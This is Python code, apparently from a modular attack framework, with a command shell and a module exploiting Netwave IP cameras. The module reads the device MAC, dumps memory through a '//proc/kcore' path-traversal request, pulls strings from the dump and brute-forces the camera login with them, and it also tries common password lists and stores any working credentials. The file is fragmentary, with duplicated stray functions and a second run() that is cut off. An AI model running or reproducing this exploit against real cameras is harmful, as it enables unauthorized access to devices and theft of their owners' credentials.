def do_info(self, line):
"""info
Prints module info"""
if self.current_frame:
pp(self.current_frame.__info__, indent=4)
else:
print_utils.time_print("Select module first")
def do_run(self, line):
"""run
Run current module"""
if self.current_frame is not None:
self.current_frame.run()
print("\n\n", end="")
else:
print_utils.time_print("Select module first")
def do_show(self, line):
"""search {options/modules}
Shows details"""
if line == "options":
if self.current_frame is None:
print_utils.time_print("Select module first")
else:
print("")
self.current_frame.print_options()
if line == "modules" or line == "":
print("")
print(print_utils.get_modules_search_table("", self.modules._arr))
if line == "info":
print("")
self.current_frame.print_info()
def do_set(self, line):
"""set [option_name] [value]
Run current module"""
def usage():
print_utils.time_print(
"Invalid number of arguments for 'set' command")
print_utils.time_print("set command usage: set <option> <value>")
if not self.current_frame:
print_utils.time_print("Select module first")
return False
line = line.split(" ")
if len(line) < 2:
usage()
return False
if len(line) != 2:
if not line[1].startswith(config.LST_IND):
usage()
return False
# for list indicator
if line[1].startswith(config.LST_IND):
line = [line[0], "".join(line[1:])]
opt_name, opt_set_value = line
options = []
for item in self.current_frame._options:
if item.opt_name == opt_name:
options.append(item)
for option in options:
try:
option.set_option_value(opt_set_value)
print_utils.clear_screen()
except Exception as e:
print_utils.clear_screen()
print("[-]", e, "\n")
self.current_frame.print_options()
return False
print_utils.time_print("There's no option called '%s'" % opt_name)
def do_use(self, line):
"""use {module_name/module_id}
Use module"""
line = line.split(" ")[0]
# By id or by name
try:
module_id = int(line)
loc_module = self.modules.by_id(module_id)
if loc_module:
module_name = loc_module["use_name"]
else:
module_name = None
except ValueError:
module_name = line
loc_module = self.modules.by_name(module_name)
module_id = loc_module["id"] if loc_module is not None else None
# Create frame
if loc_module is not None:
self.current_frame = bind_frame(loc_module["handle"])()
self.current_frame.print_options()
self.prompt = self.format_prompt % module_name
else:
print_utils.time_print("No such module like: %s" % module_name)
return False
def usage():
print_utils.time_print(
"Invalid number of arguments for 'search' command")
print_utils.time_print("set command usage: search <term>")
def usage():
print_utils.time_print(
"Invalid number of arguments for 'set' command")
print_utils.time_print("set command usage: set <option> <value>")
def run(self):
if not self.validate():
print_utils.time_print("Module run stopped")
return False
# init variables
targets, ssl = self.opt_val("targets"), self.opt_val("ssl")
protocol = "https" if ssl else "http"
pool = [(
"%s://%s/get_status.cgi" % (protocol, target),
"%s://%s//proc/kcore" % (protocol, target),
"%s://%s/check_user.cgi" % (protocol, target),
"%s" % (target),
) for target in targets]
location = 10100
sleeping = 20
for P in pool:
dump_results = []
print("[>] Target:", P[3])
string_len = 0
# Step -1: skip if in db
if self.db.is_camera_in_credentials(P[3]) is True:
print("[*] Target already in database (skipping)")
continue
# Step 0: soft bruteforce
if self.opt_val("brute") or self.opt_val("brute-only"):
ip, port = P[3].split(":")
http_discovery = HTTPStatusCodeDiscovery(ip, port)
endpoints = http_discovery.discover(["check_user.cgi"], 401)
if endpoints != []:
brute_url = endpoints[0]["url"]
print("Trying to bruteforce:", brute_url)
soft_brute = HTTPBruteforce()
usernames = AssetManager(
["bruteforce", "easy_usernames.txt"])
passwords = AssetManager(
["bruteforce", "easy_passwords.txt"])
results = soft_brute.http_basic_auth_bruteforce(
brute_url,
usernames.lines(),
passwords.lines(),
verbose=True)
for user, pwd in results:
self.save(ipport=P[3], user=user, pwd=pwd)
if results != []:
print("[+] Bruteforce succeeded. Skipping this target.")
continue
else:
if self.opt_val("brute-only"):
continue
print("[*] Bruteforce failed. Sleeping 10s to recover.")
time.sleep(10)
# Step 1 : Get MAC
try:
self.MAC = netwave_get_mac(P[0])
print("Got MAC: %s" % str(self.MAC, "utf8"))
except Exception as e:
print("Got MAC exception:", e)
continue
# Step 2 : Dump
try:
req = requests.get(P[1], stream=True, timeout=7)
print("Status code:", req.status_code)
print("Vulnarable:", "Yes" if req.status_code == 200 else "No")
for chunk in req.iter_content(chunk_size=8192):
lst, _ = strings.regex_strings(chunk)
string_len += _
print("\rProgress: %.2f%%\t" %
((string_len / location) * 100),
end="")
if self.MAC in lst:
print("\n[+] Found location")
dump_results = lst
self.db.insert_dump(ipport=P[3],
dump=b":::".join(dump_results))
break
# Step 3 : Bruteforce
if dump_results != []:
del req
print("\nSleeping: %ss" % sleeping)
time.sleep(sleeping)
brute = HTTPBruteforce()
creds = list(set(dump_results))
results = brute.http_basic_auth_bruteforce(P[2],
creds,
creds,
verbose=True)
for user, pwd in results:
self.save(ipport=P[3], user=user, pwd=pwd)
except Exception as e:
print("Dump exception: ", e)
continue
def run(self):
if not self.validate():
print_utils.time_print("Module run stopped")
return False